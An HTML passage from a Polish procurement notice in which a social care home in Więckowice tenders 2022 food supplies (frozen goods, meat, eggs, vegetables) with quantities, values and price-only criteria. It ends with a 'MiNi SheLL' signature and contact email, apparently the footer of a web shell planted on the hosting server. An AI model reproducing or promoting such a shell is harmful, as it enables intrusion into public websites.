class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Klasyfikacja ofert pod względem ceny od najniższej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mrożonki:1	Borówki mrożone opak.do 2,5 kg	kg	160<br/>2	Brokuły różyczki, paczkowane 2- 2,5 kg	kg	110<br/>3	Brukselka mrożona opak.do 2,5 kg	kg	80<br/>4	Fasola szparagowa mrożona zielona opak.do 2,5 kg	kg	70<br/>5	Fasola szparagowa mrożona żółta opak.do 2,5 kg	kg	70<br/>6	Filet z mintaja mrożony metodą „Shatter pack”, bez glazury (filety układane warstwami, oddzielone foliowymi przekładkami). barwa fileta biała, bez skóry.	kg	120<br/>7	Filet z morszczuka mrożony metodą „Shatter pack”,,bez glazury (filety układane warstwami, oddzielone foliowymi przekładkami), barwa fileta biała, bez skóry. kg	360<br/>8	Groszek zielony mrożony opak.do 2,5 kg.	kg	110<br/>9	Kalafior mrożony różyczki, paczkowane 2- 2,5 kg	kg	235<br/>10	Mieszanka kompotowa mrożona 5-cio składnikowa opakowanie do 10 kg	kg	2650<br/>11	Szpinak mrożony mielony opak. do 2,5 kg.	kg	165<br/>12	Śliwy bez pestek mrożone opak.do 2,5 kg	kg	120<br/>13	Truskawki mrożone opak.do 2,5 kg.	kg	125 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 26919 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Klasyfikacja ofert pod względem ceny od najniższej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mięso i wędliny: 1	Baleron gotowany, wędzony, mięso - karkówka wieprzowa, bez nadmiernego przerostu tłuszczu, o zawartości powyżej 70% mięsa w 100g baleronu. kg	10<br/>2	Boczek wędzony gotowany, peklowany, bez żeberek, chudy, o kształcie prostokąta. Zawartość mięsa powyżej 80% w 100g boczku. kg	153<br/>3	Boczek wędzony peklowany, bez żeberek, chudy, o kształcie prostokąta. Zawartość mięsa powyżej 80% w 100g boczku. kg	25<br/>4	Flaki wołowe blanszowane czyszczone, o barwie białej, parzone, krojone w paski, w opakowaniach do 3 kg.	kg	90<br/>5	Kaszanka w naturalnej osłonie parzona, wyprodukowana z podrobów(20 %) i tłuszczu (20%) w 100g kaszanki, z dodatkiem krwi, kaszy i przypraw (dobrze wymieszane składniki), w osłonce naturalnej	kg	145<br/>6	Kiełbasa biała wieprzowa,średniorozdrobniona , parzona, o zawartości minimum 60% mięsa w 100g kiełbasy. Składniki średnio rozdrobnione, dobrze wymieszane, w osłonce naturalnej ściśle przylegającej do farszu, 1 szt 80-100g kg	31<br/>7	Kiełbasa krakowska parzona wieprzowo - wołowa, o zawartości mięsa powyżej 60% w 100g kiełbasy, grubo rozdrobniona. kg	183<br/>8	Kiełbasa mielonka wieprzowa, o zawartości mięsa powyżej 60% w 100g kiełbasy, składniki średnio rozdrobnione.	kg	45<br/>9	Kiełbasa mortadela wieprzowo-wołowa, o zawartości mięsa 50% w 100g kiełbasy, homogenizowana, w osłonce sztucznej ściśle przylegającej do farszu. kg	90<br/>10	Kiełbasa parówkowa wieprzowa, o zawartości powyżej 70% mięsa w 100g wyrobu. Składniki drobno rozdrobnione, dobrze wymieszane, w osłonce sztucznej, ściśle przylegającej do farszu, 1 szt 100 -110g kg	180<br/>11	Kiełbasa podwawelska kiełbasa wieprzowa, średnio rozdrobniona, parzona, wędzona zawierająca minimum 70% mięsa wieprzowego w 100 gramach kiełbasy, w osłonce naturalnej	kg	50<br/>12	Kiełbasa szynkowa gruborozdrobniona, wieprzowa, wędzona, parzona, zawierająca minimum 60% mięsa wieprzowego w 100g kiełbasy	kg	200<br/>13	Kiełbasa wiejska drobiowa cienka, wędzona,piewczona o zawartości powyżej 70 gram mięsa drobiowego i 46 gram mięsa wieprzowego w 100g wyrobu. Składniki średniorozdrobnione, dobrze wymieszane, w osłonce naturalnej, ściśle przylegającej do farszu.	kg	100<br/>14	kiełbasa swojska, wieprzowa, cienka, wędzona, pieczona, o zawartosci powyżej 70 gram mięsa drobiowego i 46 gram miesa wieprzowego w 100 gramach wyrobu. Składniki średniorozdrobnione, dobrze wymieszane, w psłonce naturalnej, ściśle przylegającej do farszu.	kg	250<br/>15	Kiełbasa zielonogórska wieprzowa ,średnio rozdrobniona, parzona zawierająca min.51% mięsa wieprzowego w 100 gramach kiełbasy.	kg	59<br/>16	Kiełbasa zwyczajna wieprzowa, cienka, składniki średnio rozdrobnione, o zawartości 60% mięsa w 100g kiełbasy, z małą ilością tłuszczu, w osłonce naturalnej ściśle przylegającej do farszu, skórka łatwo się ściągająca. kg	150<br/>17	Kiełbasa żywiecka wieprzowa, wędzona, pieczona,o zawartości powyżej 80% mięsa w 100g kiełbasy. Składniki średnio rozdrobnione, dobrze wymieszane. W osłonce sztucznej, ściśle przylegającej do farszu, przylegającej do farszu, skórka łatwo się ściągająca. kg	407<br/>18	Kości wieprzowe w kawałkach do 1 kg	kg	600<br/>19	Kości wołowe w kawałkach do 1 kg	kg	300<br/>20	Kurczak świeży surowy, waga tuszki ok.1,60 - 1,8 kg I gat. oczyszczony, wypatroszony, barwa mięśnia różowa, bez nadmiernego wycieku, schłodzony, nie mrożony, pozbawiony piór. kg	480<br/>21	Mięso – filet z kurczaka surowy, I gat., bez kości, barwa mięśnia- różowa,waga netto, bez śladów wody i lodu.	kg	180<br/>22	Mięso udko z kurczaka, surowe, I gat. , oczyszczony, bez piór, barwa mięśnia różowa, waga 1 szt 230-250g	kg	1170<br/>23	Mięso gulaszowe wieprzowe gatunek I , chude,bez skóry, bez słoniny, barwa mięśnia-jasno różowa,waga netto, bez śladów wody i lodu.	kg	610<br/>24	Mięso gulaszowe wołowe gatunek I chude, barwa mięśnia-jasno czerwona,waga netto, bez śladów wody i lodu.	kg	600<br/>25	Mięso karczek wieprzowy bez kości I gat, chudy,waga netto, bez śladów wody i lodu.	kg	20<br/>26	Mięso łopatka wieprzowa bez kości, I gat, bez skóry, bez słoniny, barwa mięśnia-jasno różowa,waga netto, bez śladów wody i lodu.	kg	20<br/>27	Mięso pieczeń woł. I gat. młode, bez tłuszczu, o barwie mięśnia - jasno czerwonej, nie przerośnięta żyłami, waga netto, bez śladów wody i lodu.	kg	500<br/>28	Mięso schab z kością I gat. bez słoniny, barwa mięśnia – różowa,waga netto, bez śladów wody i lodu.	kg	695<br/>29	Mięso żeberka – surowe, wąskie, cięte paski, chude,waga netto, bez śladów wody i lodu.	kg	155<br/>30	Ogonówka wędzona gotow.wieprzowa, o zawartości powyżej 80% mięsa w 100g ogonówki.	kg	70<br/>31	Parówki cienkie drobiowo- wieprzowa o zawartości powyżej 60% mięsa w 100g wyrobu	kg	625<br/>32	Pasztet drobiowy o zawartości podrobów i mięsa powyżej 70% w 100g wyrobu, powierzchnia pasztetu zapieczona	kg	205<br/>33	Pasztetowa drobiowa o zawartości surowców drobiowych powyżej 41% (skórki z indyka i kurczaka, wątroba z kurczaka, mięso mechanicznie oddzielone indycze), i surowców wieprzowych powyżej 20% (tłuszcz wieprzowy, skórki wieprzowe, wątroba wieprzowa). kg	363<br/>34	Polędwica drobiowa gruborozdrobniona zawierająca minimum 76 % mięsa drobiowego w 100 gramach polędwicy.	kg	120<br/>35	Polędwica sopocka wieprzowa wędzona, parzona, o zawartości powyżej 80% mięsa w 100g polędwicy.	kg	35<br/>36	Rolada boczkowa wędzona gotowana zawierająca minimum 70% mięsa w 100 gramach produktu	kg	25<br/>37	Rolada schabowa wędzona gotowana zawierająca minimum 70% mięsa w 100 gramach produktu.	kg	28<br/>38	Salceson drobiowy z indyka batony we folii, parzony, z małą ilością galarety, o zawartości mięsa drobiowego min 70% w 100g salcesonu, bez chrząstek. kg	325<br/>39	Szynka gotowana drobiowa - blok indyczy, o zawartości powyżej 60% mięsa w 100g szynki, składniki grubo rozdrobnione, równomiernie rozłożone, w osłonce sztucznej ściśle przylegającej do farszu.	kg	20<br/>40	Szynka konserwowa wieprzowa, o zawartości powyżej 60% mięsa w 100g szynki, prasowana, mięso grubo rozdrobnione.	kg	183<br/>41	Szynka wiejska, wędzona gotowana parzona, mięso nie rozdrabniane, w kawałku, 100 g produktu otrzymanego ze 120g mięsa wieprzowego, chuda, nie popękana. kg	360<br/>42	Wątroba drobiowa surowa, różowa, z kurczaka, bez żółci.	kg	51<br/>43	Wątroba wieprzowa o barwie jasno brązowej, bez przekrwień, bez żółci.	kg	60<br/>44	Żołądki drobiowe surowe, oczyszczone, z kurczaka.	kg	10 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 126119 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Klasyfikacja ofert pod względem ceny od najniższej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Jajka kurze szt 42 400 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 15006 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Klasyfikacja ofert pod względem ceny od najniższej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ziemniaki warzywa okopowe:1	Buraki czerwone	kg.	870<br/>2	Cebula	kg.	800<br/>3	Kapusta biała	kg.	450<br/>4	Kapusta czerwona	kg.	160<br/>5	Marchew kg.	1650<br/>6	Pietruszka	kg.	470<br/>7	Por	szt	200<br/>8	Seler	kg.	600<br/>9	Ziemniaki	kg.	9 000 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 9235 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Klasyfikacja ofert pod względem ceny od najniższej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Owoce i warzywa pozostałe:1	Banany owoce zdrowe, o barwie żółtej, bez ciemnych przebarwień, dojrzałe, średniej wielkości kg	252<br/>2	Cytryny dojrzałe owoce , średniej wielkości , cienka skórka	kg	111<br/>3	Fasola Jaś biała, sucha, duża, bez śladu pleśni i robaków, pakowana w worki foliowe po 5kg	kg	36<br/>4	Groch żółty łuskany ,suchy, bez śladu pleśni i robaków, pakowany w worki foliowe po 5kg	kg	25<br/>5	Grzyby pieczarki świeże , białe, średniej wielkości, bez uszkodzeń, czyste	kg	35<br/>6	Grzyby suszone - podgrzybki suche, bez śladu pleśni i robaków, pakowane w worki foliowe po 20-50 gram	kg	1,5<br/>7	Jabłka deserowe gat.I, owoce dojrzałe o wadze 1szt – 150g - 200g	kg	2300<br/>8	Kapusta kiszona dobrej jakości, o barwie białej, bez posmaku goryczki, bez dodatku octu, pakowana w opak.foliowe o wadze 1 kg-5 kg.	kg	101<br/>9	Kapusta pekińska świeża, średnia wielkość, nie uszkodzona, bez posmaku goryczki, o wadze 1 -1,40kg	szt.	120<br/>10	Kiwi , 1 szt. 80g – 130g, owoce dojrzałe, zdrowe	kg	80<br/>11	Mandarynki 1 szt. ok. 50g, owoce zdrowe, bez pestek, słodkie	kg	240<br/>12	Ogórki kiszone solony z umiarem, twardy, pakowany w opakowania foliowe o wadze 1 kg-5 kg . Ogórki średniej wielkości.	kg	270<br/>13	Pomarańcze 1 szt. ok. 150g-200g, owoce zdrowe, dojrzałe, słodkie	kg	120<br/>14	Pomidory świeże świeży, dojrzały, zdrowy, twardy, średniej wielkości	kg	700<br/>15	Rzodkiewka świeża, zdrowa, bez posmaku goryczki, pęczki, rzodkiewki średniej wielkości (12 - 15 szt w pęczku)	pęcz.	160<br/>16	Sałata zielona świeża, czysta, główki,o wadze około 200-300g, bez posmaku goryczki, nie uszkodzona, pakowana w skrzynkach szt.	90<br/>17	Szczypior świeży zielony, waga od 50-100g	pęcz.	500 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 16128 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Klasyfikacja ofert pod względem ceny od najniższej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Umowa może zostać przedłużona aneksem, (nie dotyczy umowy na część 7 i 8) jednak na <br/> okres nie dłuższy niż o jeden miesiąc, przy zachowaniu poniższych warunków:<br/> - ilości zakupionych artykułów będą nie większe niż 1/12 całości artykułów umowy.<br/> - kwota należności za zakupione artykuły będzie nie wyższa niż 1/12 należności umownej. <br/> - pozostałe warunki umowy bez zmian.<br/>2.W trakcie realizacji umowy każdej ze stron przysługiwać będzie prawo ubiegania się o <br/> zmianę cen na okres od pierwszego dnia miesiąca następującego po dacie wniosku w <br/> oparciu o miesięczne wskaźniki cen towarów i usług konsumpcyjnych ogłaszane przez GUS.<br/>Strona wnioskująca o zmianę ceny dołącza do wniosku aktualny wydruk strony GUS (https://stat.gov.pl/obszary-tematyczne/ceny-handel/wskazniki-cen/wskazniki-cen-towarow-i-uslug-konsumpcyjnych-pot-inflacja-/miesieczne-wskazniki-cen-towarow-i-uslug-konsumpcyjnych-od-1982-roku/ ), na której zamieszczono „miesięczne wskaźniki cen towarów i usług konsumpcyjnych od 1982 roku oraz wyliczenie nowych cen”. <br/>Strony mogą zamiennie uzgodnić inną zmianę cen niż w/w wskaźniki, jednakże zmiana ta nie może być dla Zamawiającego niekorzystna w stosunku do zmiany z zastosowaniem powyższych wskaźników.<br/>Warunkiem zmiany cen będzie podpisanie aneksu do umowy w tej sprawie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">skrytka ePUAP Dom Pomocy Społecznej w Więckowicach/dpswieckowice/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-07 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com